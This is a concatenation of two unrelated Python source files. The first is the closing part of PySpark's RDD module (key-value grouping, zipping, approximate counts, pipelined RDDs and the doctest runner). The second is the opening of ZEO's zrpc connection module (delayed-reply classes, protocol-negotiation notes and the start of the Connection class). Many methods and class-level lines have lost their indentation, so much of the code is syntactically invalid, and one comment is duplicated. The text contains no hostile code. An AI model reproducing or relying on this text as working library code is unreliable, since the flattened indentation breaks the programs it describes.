        [('a', [1, 1]), ('b', [1])]
        """
        def createCombiner(x):
            # Start a new group as a one-element list.
            return [x]
        def mergeValue(xs, x):
            # Append to an existing group (mutates in place, then returns it).
            xs.append(x)
            return xs
        def mergeCombiners(a, b):
            # Merge two groups built on different partitions.
            a.extend(b)
            return a
        memory = self._memory_limit()
        serializer = self._jrdd_deserializer
        agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
        def combine(iterator):
            # Map-side grouping with spilling at 90% of the memory budget.
            merger = ExternalMerger(agg, memory * 0.9, serializer)
            merger.mergeValues(iterator)
            return merger.items()
        locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
        shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
        def groupByKey(it):
            # Reduce-side grouping; ExternalGroupBy presumably handles
            # oversized groups out of core — see the shuffle module.
            merger = ExternalGroupBy(agg, memory, serializer)
            merger.mergeCombiners(it)
            return merger.items()
        # Wrap each group's value list in ResultIterable for lazy iteration.
        return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
    def cogroup(self, other, numPartitions=None):
        """
        For each key k in C{self} or C{other}, return a resulting RDD that
        contains a tuple with the list of values for that key in C{self} as
        well as C{other}.

        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2)])
        >>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
        [('a', ([1], [2])), ('b', ([4], []))]
        """
        # Two-RDD special case of the shared cogroup helper.
        return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
    def coalesce(self, numPartitions, shuffle=False):
        """
        Return a new RDD that is reduced into `numPartitions` partitions.

        >>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
        [[1], [2, 3], [4, 5]]
        >>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
        [[1, 2, 3, 4, 5]]
        """
        if shuffle:
            # Decrease the batch size in order to distribute evenly the elements across output
            # partitions. Otherwise, repartition will possibly produce highly skewed partitions.
            batchSize = min(10, self.ctx._batchSize or 1024)
            ser = BatchedSerializer(PickleSerializer(), batchSize)
            selfCopy = self._reserialize(ser)
            jrdd_deserializer = selfCopy._jrdd_deserializer
            jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
        else:
            # No shuffle: coalesce on the JVM side, keeping our serializer.
            jrdd_deserializer = self._jrdd_deserializer
            jrdd = self._jrdd.coalesce(numPartitions, shuffle)
        return RDD(jrdd, self.ctx, jrdd_deserializer)
    def zip(self, other):
        """
        Zips this RDD with another one, returning key-value pairs that pair
        the first element of each RDD together, the second element of each
        RDD together, and so on. Assumes that the two RDDs have the same
        number of partitions and the same number of elements in each
        partition (e.g. one was made through a map on the other).

        >>> x = sc.parallelize(range(0,5))
        >>> y = sc.parallelize(range(1000, 1005))
        >>> x.zip(y).collect()
        [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
        """
        def get_batch_size(ser):
            if isinstance(ser, BatchedSerializer):
                return ser.batchSize
            return 1  # not batched
        def batch_as(rdd, batchSize):
            return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
        my_batch = get_batch_size(self._jrdd_deserializer)
        other_batch = get_batch_size(other._jrdd_deserializer)
        if my_batch != other_batch or not my_batch:
            # Batch sizes must agree so the JVM zips batches element-for-element;
            # use the smallest batchSize for both of them.
            batchSize = min(my_batch, other_batch)
            if batchSize <= 0:
                # auto batched or unlimited: fall back to a fixed batch size
                batchSize = 100
            other = batch_as(other, batchSize)
            self = batch_as(self, batchSize)
        if self.getNumPartitions() != other.getNumPartitions():
            raise ValueError("Can only zip with RDD which has the same number of partitions")
        # There will be an Exception in JVM if there are different number
        # of items in each partitions.
        pairRDD = self._jrdd.zip(other._jrdd)
        deserializer = PairDeserializer(self._jrdd_deserializer,
                                        other._jrdd_deserializer)
        return RDD(pairRDD, self.ctx, deserializer)
    def zipWithIndex(self):
        """
        Zips this RDD with its element indices.

        The ordering is first based on the partition index and then the
        ordering of items within each partition. So the first item in
        the first partition gets index 0, and the last item in the last
        partition receives the largest index.

        This method needs to trigger a spark job when this RDD contains
        more than one partitions.

        >>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
        [('a', 0), ('b', 1), ('c', 2), ('d', 3)]
        """
        # starts[k] is the global index of the first element in partition k.
        starts = [0]
        if self.getNumPartitions() > 1:
            # Count each partition's length (this triggers a job), then build
            # the cumulative offsets.
            nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
            for i in range(len(nums) - 1):
                starts.append(starts[-1] + nums[i])
        def func(k, it):
            # Number the items of partition k starting at its global offset.
            for i, v in enumerate(it, starts[k]):
                yield v, i
        return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
    @ignore_unicode_prefix
    def setName(self, name):
        """
        Assign a name to this RDD.

        >>> rdd1 = sc.parallelize([1, 2])
        >>> rdd1.setName('RDD1').name()
        u'RDD1'
        """
        self._jrdd.setName(name)
        # Return self so calls can be chained, as in the doctest above.
        return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
    def getStorageLevel(self):
        """
        Get the RDD's current storage level.

        >>> rdd1 = sc.parallelize([1,2])
        >>> rdd1.getStorageLevel()
        StorageLevel(False, False, False, False, 1)
        >>> print(rdd1.getStorageLevel())
        Serialized 1x Replicated
        """
        # Translate the JVM-side storage level object field-by-field into the
        # Python StorageLevel type.
        java_storage_level = self._jrdd.getStorageLevel()
        storage_level = StorageLevel(java_storage_level.useDisk(),
                                     java_storage_level.useMemory(),
                                     java_storage_level.useOffHeap(),
                                     java_storage_level.deserialized(),
                                     java_storage_level.replication())
        return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
    def lookup(self, key):
        """
        Return the list of values in the RDD for key `key`. This operation
        is done efficiently if the RDD has a known partitioner by only
        searching the partition that the key maps to.

        >>> l = range(1000)
        >>> rdd = sc.parallelize(zip(l, l), 10)
        >>> rdd.lookup(42) # slow
        [42]
        >>> sorted = rdd.sortByKey()
        >>> sorted.lookup(42) # fast
        [42]
        >>> sorted.lookup(1024)
        []
        >>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
        >>> list(rdd2.lookup(('a', 'b'))[0])
        ['c']
        """
        values = self.filter(lambda kv: kv[0] == key).values()
        if self.partitioner is not None:
            # Known partitioner: run the job only on the single partition
            # that can contain this key.
            return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
        # No partitioner known: must scan every partition.
        return values.collect()
    def _to_java_object_rdd(self):
        """ Return a JavaRDD of Object by unpickling

        It will convert each Python object into Java object by Pyrolite, whenever the
        RDD is serialized in batch or not.
        """
        # Normalize to pickle serialization first, then let the JVM side
        # unpickle into Java objects.
        rdd = self._pickled()
        return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
    def countApprox(self, timeout, confidence=0.95):
        """
        .. note:: Experimental

        Approximate version of count() that returns a potentially incomplete
        result within a timeout, even if not all tasks have finished.

        >>> rdd = sc.parallelize(range(1000), 10)
        >>> rdd.countApprox(1000, 1.0)
        1000
        """
        # Count each partition as a float, then reuse the approximate-sum
        # machinery; truncate the bounded result back to an int.
        drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
        return int(drdd.sumApprox(timeout, confidence))
    def sumApprox(self, timeout, confidence=0.95):
        """
        .. note:: Experimental

        Approximate operation to return the sum within a timeout
        or meet the confidence.

        >>> rdd = sc.parallelize(range(1000), 10)
        >>> r = sum(range(1000))
        >>> abs(rdd.sumApprox(1000) - r) / r < 0.05
        True
        """
        # Pre-sum each partition in Python, then delegate the approximate
        # aggregation to the JVM's JavaDoubleRDD.
        jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
        jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
        r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
        # Wrap the JVM bounded result in the Python BoundedFloat type.
        return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
    def meanApprox(self, timeout, confidence=0.95):
        """
        .. note:: Experimental

        Approximate operation to return the mean within a timeout
        or meet the confidence.

        >>> rdd = sc.parallelize(range(1000), 10)
        >>> r = sum(range(1000)) / 1000.0
        >>> abs(rdd.meanApprox(1000) - r) / r < 0.05
        True
        """
        # Coerce every element to float, then let the JVM's JavaDoubleRDD
        # compute the approximate mean.
        jrdd = self.map(float)._to_java_object_rdd()
        jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
        r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
        # Wrap the JVM bounded result in the Python BoundedFloat type.
        return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
    def countApproxDistinct(self, relativeSD=0.05):
        """
        .. note:: Experimental

        Return approximate number of distinct elements in the RDD.

        The algorithm used is based on streamlib's implementation of
        `"HyperLogLog in Practice: Algorithmic Engineering of a State
        of The Art Cardinality Estimation Algorithm", available here
        <http://dx.doi.org/10.1145/2452376.2452456>`_.

        :param relativeSD: Relative accuracy. Smaller values create
                           counters that require more space.
                           It must be greater than 0.000017.

        >>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
        >>> 900 < n < 1100
        True
        >>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
        >>> 16 < n < 24
        True
        """
        if relativeSD < 0.000017:
            raise ValueError("relativeSD should be greater than 0.000017")
        # the hash space in Java is 2^32, so mask Python hashes to 32 bits
        hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
        return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
    def toLocalIterator(self):
        """
        Return an iterator that contains all of the elements in this RDD.
        The iterator will consume as much memory as the largest partition in this RDD.

        >>> rdd = sc.parallelize(range(10))
        >>> [x for x in rdd.toLocalIterator()]
        [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
        """
        with SCCallSiteSync(self.context) as css:
            # Ask the JVM to serve the RDD's partitions over a local socket;
            # sock_info describes where/how to connect.
            sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
        return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
    """Serialize *command* and gather the context needed to build a PythonRDD.

    Returns (pickled_command, broadcast_vars, environment, python_includes).
    """
    # the serialized command will be compressed by broadcast
    ser = CloudPickleSerializer()
    pickled_command = ser.dumps(command)
    if len(pickled_command) > (1 << 20):  # 1M
        # Ship oversized commands as a broadcast variable instead of inline.
        # The broadcast will have same life cycle as created PythonRDD
        broadcast = sc.broadcast(pickled_command)
        pickled_command = ser.dumps(broadcast)
    # Collect broadcast variables referenced during pickling, then reset the
    # per-context accumulation list.
    broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
    sc._pickled_broadcast_vars.clear()
    return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
    """Bundle a Python function plus its (de)serializers into a JVM-side
    PythonFunction object that PythonRDD can execute."""
    assert deserializer, "deserializer should not be empty"
    assert serializer, "serializer should not be empty"
    command = (func, profiler, deserializer, serializer)
    pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
    return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
                                  sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):

    """
    An RDD whose Python transformation is fused with its predecessor's, so
    consecutive maps/filters run in a single Python worker pass.

    Pipelined maps:

    >>> rdd = sc.parallelize([1, 2, 3, 4])
    >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]
    >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]

    Pipelined reduces:

    >>> from operator import add
    >>> rdd.map(lambda x: 2 * x).reduce(add)
    20
    >>> rdd.flatMap(lambda x: [x, x]).reduce(add)
    20
    """

    def __init__(self, prev, func, preservesPartitioning=False):
        if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
            # This transformation is the first in its stage:
            self.func = func
            self.preservesPartitioning = preservesPartitioning
            self._prev_jrdd = prev._jrdd
            self._prev_jrdd_deserializer = prev._jrdd_deserializer
        else:
            # Fuse with the previous pipelinable transformation: compose the
            # two functions so both run in one pass over the data.
            prev_func = prev.func

            def pipeline_func(split, iterator):
                return func(split, prev_func(split, iterator))
            self.func = pipeline_func
            self.preservesPartitioning = \
                prev.preservesPartitioning and preservesPartitioning
            self._prev_jrdd = prev._prev_jrdd  # maintain the pipeline
            self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = prev.ctx
        self.prev = prev
        # The JVM-side RDD and its id are created lazily (see _jrdd below).
        self._jrdd_val = None
        self._id = None
        self._jrdd_deserializer = self.ctx.serializer
        self._bypass_serializer = False
        self.partitioner = prev.partitioner if self.preservesPartitioning else None

    def getNumPartitions(self):
        # Pipelining never changes the partition count; ask the upstream RDD.
        return self._prev_jrdd.partitions().size()

    @property
    def _jrdd(self):
        # Build (and memoize) the JVM-side PythonRDD on first access.
        if self._jrdd_val:
            return self._jrdd_val
        if self._bypass_serializer:
            self._jrdd_deserializer = NoOpSerializer()
        if self.ctx.profiler_collector:
            profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
        else:
            profiler = None
        wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
                                      self._jrdd_deserializer, profiler)
        python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
                                             self.preservesPartitioning)
        self._jrdd_val = python_rdd.asJavaRDD()

        if profiler:
            # Register the profiler under the new RDD's id for later dumping.
            self._id = self._jrdd_val.id()
            self.ctx.profiler_collector.add_profiler(self._id, profiler)
        return self._jrdd_val

    def id(self):
        if self._id is None:
            self._id = self._jrdd.id()
        return self._id

    def _is_pipelinable(self):
        # Caching/checkpointing materializes this RDD's output, so later
        # transformations must not be fused into it.
        return not (self.is_cached or self.is_checkpointed)
def _test():
    """Run this module's doctests against a local 4-thread SparkContext.

    Exits the process with a nonzero status if any doctest fails.
    """
    import doctest
    import sys
    from pyspark.context import SparkContext
    globs = globals().copy()
    # The small batch size here ensures that we see multiple batches,
    # even in these small test examples:
    globs['sc'] = SparkContext('local[4]', 'PythonTest')
    (failure_count, test_count) = doctest.testmod(
        globs=globs, optionflags=doctest.ELLIPSIS)
    globs['sc'].stop()
    if failure_count:
        # Use sys.exit rather than the site-injected exit(), which is not
        # guaranteed to exist (e.g. under python -S or in frozen builds).
        sys.exit(-1)
# Run the doctest suite when this module is executed directly.
if __name__ == "__main__":
    _test()
|
connection.py | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
import asyncore
import errno
import json
import sys
import threading
import logging
from . import marshal
from . import trigger
from . import smac
from .error import ZRPCError, DisconnectedError
from .log import short_repr, log
from ZODB.loglevels import BLATHER, TRACE
import ZODB.POSException
REPLY = ".reply" # message name used for replies
# Metaclass of built-in exceptions; presumably used to recognize exception
# *classes* (as opposed to instances) — confirm at the call sites.
exception_type_type = type(Exception)
# Module-wide switch for verbose zrpc debug tracing.
debug_zrpc = False
class Delay(object):
    """Postpone the response to a synchronous client call.

    When a synchronous call is made and the original handler returns
    without handling the call, it returns a Delay object that prevents
    the mainloop from sending a response.
    """

    # Populated by set_sender(); 'sent' records how the delay was resolved.
    msgid = None
    conn = None
    sent = None

    def set_sender(self, msgid, conn):
        """Record the message id and connection the eventual answer targets."""
        self.msgid = msgid
        self.conn = conn

    def reply(self, obj):
        """Send *obj* as the reply for the recorded message id."""
        self.sent = 'reply'
        self.conn.send_reply(self.msgid, obj)

    def error(self, exc_info):
        """Log the failure and propagate the exception back to the caller."""
        self.sent = 'error'
        log("Error raised in delayed method", logging.ERROR, exc_info=exc_info)
        self.conn.return_error(self.msgid, *exc_info[:2])

    def __repr__(self):
        details = (self.__class__.__name__, id(self),
                   self.msgid, self.conn, self.sent)
        return "%s[%s, %r, %r, %r]" % details
class Result(Delay):
    """A Delay whose reply is already known when the handler returns.

    Instead of waiting to be resolved, set_sender() immediately sends the
    precomputed reply and then invokes the follow-up callback.
    """

    def __init__(self, *args):
        # args is expected to be (reply, callback).
        self.args = args

    def set_sender(self, msgid, conn):
        reply_value, after_send = self.args
        conn.send_reply(msgid, reply_value, False)
        after_send()
class MTDelay(Delay):
    """A Delay that can be resolved from a thread other than the asyncore
    mainloop: reply()/error() wait until the sender is known, then hand the
    actual send back to the connection's thread via call_from_thread()."""
    def __init__(self):
        # Set once set_sender() has recorded the msgid and connection.
        self.ready = threading.Event()
    def set_sender(self, *args):
        Delay.set_sender(self, *args)
        self.ready.set()
    def reply(self, obj):
        # Block until set_sender() has run, so msgid/conn are valid.
        self.ready.wait()
        self.conn.call_from_thread(self.conn.send_reply, self.msgid, obj)
    def error(self, exc_info):
        self.ready.wait()
        log("Error raised in delayed method", logging.ERROR, exc_info=exc_info)
        # Delegate the actual error send to the connection's own thread.
        self.conn.call_from_thread(Delay.error, self, exc_info)
# PROTOCOL NEGOTIATION
#
# The code implementing protocol version 2.0.0 (which is deployed
# in the field and cannot be changed) *only* talks to peers that
# send a handshake indicating protocol version 2.0.0. In that
# version, both the client and the server immediately send out
# their protocol handshake when a connection is established,
# without waiting for their peer, and disconnect when a different
# handshake is received.
#
# The new protocol uses this to enable new clients to talk to
# 2.0.0 servers. In the new protocol:
#
# The server sends its protocol handshake to the client at once.
#
# The client waits until it receives the server's protocol handshake
# before sending its own handshake. The client sends the lower of its
# own protocol version and the server protocol version, allowing it to
# talk to servers using later protocol versions (2.0.2 and higher) as
# well: the effective protocol used will be the lower of the client
# and server protocol. However, this changed in ZODB 3.3.1 (and
# should have changed in ZODB 3.3) because an older server doesn't
# support MVCC methods required by 3.3 clients.
#
# [Ugly details: In order to treat the first received message (protocol
# handshake) differently than all later messages, both client and server
# start by patching their message_input() method to refer to their
# recv_handshake() method instead. In addition, the client has to arrange
# to queue (delay) outgoing messages until it receives the server's
# handshake, so that the first message the client sends to the server is
# the client's handshake. This multiply-special treatment of the first
# message is delicate, and several asyncore and thread subtleties were
# handled unsafely before ZODB 3.2.6.
# ]
#
# The ZEO modules ClientStorage and ServerStub have backwards
# compatibility code for dealing with the previous version of the
# protocol. The client accepts the old version of some messages,
# and will not send new messages when talking to an old server.
#
# As long as the client hasn't sent its handshake, it can't send
# anything else; output messages are queued during this time.
# (Output can happen because the connection testing machinery can
# start sending requests before the handshake is received.)
#
# UPGRADING FROM ZEO 2.0.0 TO NEWER VERSIONS:
#
# Because a new client can talk to an old server, but not vice
# versa, all clients should be upgraded before upgrading any
# servers. Protocol upgrades beyond 2.0.1 will not have this
# restriction, because clients using protocol 2.0.1 or later can
# talk to both older and newer servers.
#
# No compatibility with protocol version 1 is provided.
# Connection is abstract (it must be derived from). ManagedServerConnection
# and ManagedClientConnection are the concrete subclasses. They need to
# supply a handshake() method appropriate for their role in protocol
# negotiation.
class Connection(smac.SizedMessageAsyncConnection, object):
"""Dispatcher for RPC on object on both sides of socket.
The connection supports synchronous calls, which expect a return,
and asynchronous calls, which do not.
It uses the Marshaller class to handle encoding and decoding of
method calls and arguments. Marshaller uses pickle to encode
arbitrary Python objects. The code here doesn't ever see the wire
format.
A Connection is designed for use in a multithreaded application,
where a synchronous call must block until a response is ready.
A socket connection between a client and a server allows either
side to invoke methods on the other side. The processes on each
end of the socket use a Connection object to manage communication.
The Connection deals with decoded RPC messages. They are
represented as four-tuples containing: msgid, flags, method name,
and a tuple of method arguments.
The msgid starts at zero and is incremented by one each time a
method call message is sent. Each side of the connection has a
separate msgid state.
When one side of the connection (the client) calls a method, it
sends a message with a new msgid. The other side (the server),
replies with a message that has the same msgid, the string
".reply" (the global variable REPLY) as the method name, and the
actual return value in the args position. Note that each side of
the Connection can initiate a call, in which case it will be the
client for that particular call.
The protocol also supports asynchronous calls. The client does
not wait for a return value for an asynchronous call.
If a method call raises an Exception, the exception is propagated
back to the client via the REPLY message. The client side will
raise any exception it receives instead of returning the value to
the caller.
"""
__super_init = smac.SizedMessageAsyncConnection.__init__
__super_close = smac.SizedMessageAsyncConnection.close
__super_setSessionKey = smac.SizedMessageAsyncConnection.setSessionKey
# Protocol history:
#
# Z200 -- Original ZEO 2.0 protocol
#
# Z201 -- Added invalidateTransaction() to client.
# Renamed several client methods.
    # Added several server methods:
# lastTransaction()
# getAuthProtocol() and scheme-specific authentication methods
# getExtensionMethods().
# getInvalidations().
#
# Z303 -- named after the ZODB release 3.3
# Added methods for MVCC:
# loadBefore()
# A Z303 client cannot talk to a Z201 server, because the latter
# doesn't support MVCC. A Z201 client can talk to a Z303 server,
# but because (at least) the type of the root object changed
# from ZODB.PersistentMapping to persistent.mapping, the older
# client can't actually make progress if a Z303 client created,
# or ever modified, the root.
#
# Z308 -- named after the ZODB release 3.8
# Added blob-support server methods:
# sendBlob
# storeBlobStart
# storeBlobChunk
# storeBlobEnd
# storeBlobShared
# Added blob-support client methods:
# receiveBlobStart
# receiveBlobChunk
# receiveBlobStop
#
# Z309 -- named after the ZODB release 3.9
# New server methods:
# restorea, iterator_start, iterator_next,
# iterator_record_start, iterator_record_next,
# iterator_gc
#
# Z310 -- named after the ZODB release 3.10
# New server methods:
# undoa
# Doesn't support undo for older clients.
# Undone oid info returned by vote.
#
# Z3101 -- checkCurrentSerialInTransaction
#
# Z4 -- checkCurrentSerialInTransaction
# No-longer call load.
# Protocol variables:
# Our preferred protocol.
current_protocol = b"Z4"
# If we're a client, an exhaustive list of the server protocols we
# can accept.
servers_we_can_talk_to = [b"Z308", b"Z309", b"Z310", b"Z3101",
current_protocol]
# If we're a server, an exhaustive list of the client protocols we
# can accept.
clients_we_can_talk_to = [
b"Z200", b"Z201", b"Z303", b"Z308", b"Z309", b"Z310", b"Z3101",
current_protocol]
# This is pretty excruciating. Details:
#
# 3.3 server 3.2 client
# server sends Z303 to client
# client computes min(Z303, Z201) == Z201 as the protocol to use
# client sends Z201 to server
# OK, because Z201 is in the server's clients_we_can_talk_to
#
# 3.2 server 3.3 client
# server sends Z201 to client
# client computes min(Z303, Z201) == Z201 as the protocol to use
# Z201 isn't in the client's servers_we_can_talk_to, so client
# raises exception
#
# 3.3 server 3.3 client
# server sends Z303 to client
# client computes min(Z303, Z303) == Z303 as the protocol to use
# Z303 is in the client's servers_we_can_talk_to, so client
# sends Z303 to server
# OK, because Z303 is in the server's clients_we_can_talk_to
# Exception types that should not be logged:
unlogged_exception_types = ()
# Client constructor passes b'C' for tag, server constructor b'S'. This
# is used in log messages, and to determine whether we can speak with
# our peer.
# Client constructor passes b'C' for tag, server constructor b'S'.  This
# is used in log messages, and to determine whether we can speak with
# our peer.
def __init__(self, sock, addr, obj, tag, map=None):
    """Wire up the connection and start the protocol handshake.

    :param sock: connected socket handed to the asyncore base class.
    :param addr: peer address -- a (host, port) tuple for TCP, any other
        value (e.g. a UNIX socket path) otherwise.
    :param obj: object that incoming remote calls are dispatched to
        (registered below via register_object()).
    :param tag: b'C' for a client connection, b'S' for a server one.
    :param map: asyncore socket map; defaults to asyncore's global map.
    """
    self.obj = None
    self.decode = marshal.decode
    self.encode = marshal.encode
    self.fast_encode = marshal.fast_encode
    self.closed = False
    self.peer_protocol_version = None # set in recv_handshake()
    assert tag in b"CS"
    self.tag = tag
    self.logger = logging.getLogger('ZEO.zrpc.Connection(%r)' % tag)
    if isinstance(addr, tuple):
        self.log_label = "(%s:%d) " % addr
    else:
        self.log_label = "(%s) " % addr
    # Supply our own socket map, so that we don't get registered with
    # the asyncore socket map just yet.  The initial protocol messages
    # are treated very specially, and we dare not get invoked by asyncore
    # before that special-case setup is complete.  Some of that setup
    # occurs near the end of this constructor, and the rest is done by
    # a concrete subclass's handshake() method.  Unfortunately, because
    # we ultimately derive from asyncore.dispatcher, it's not possible
    # to invoke the superclass constructor without asyncore stuffing
    # us into _some_ socket map.
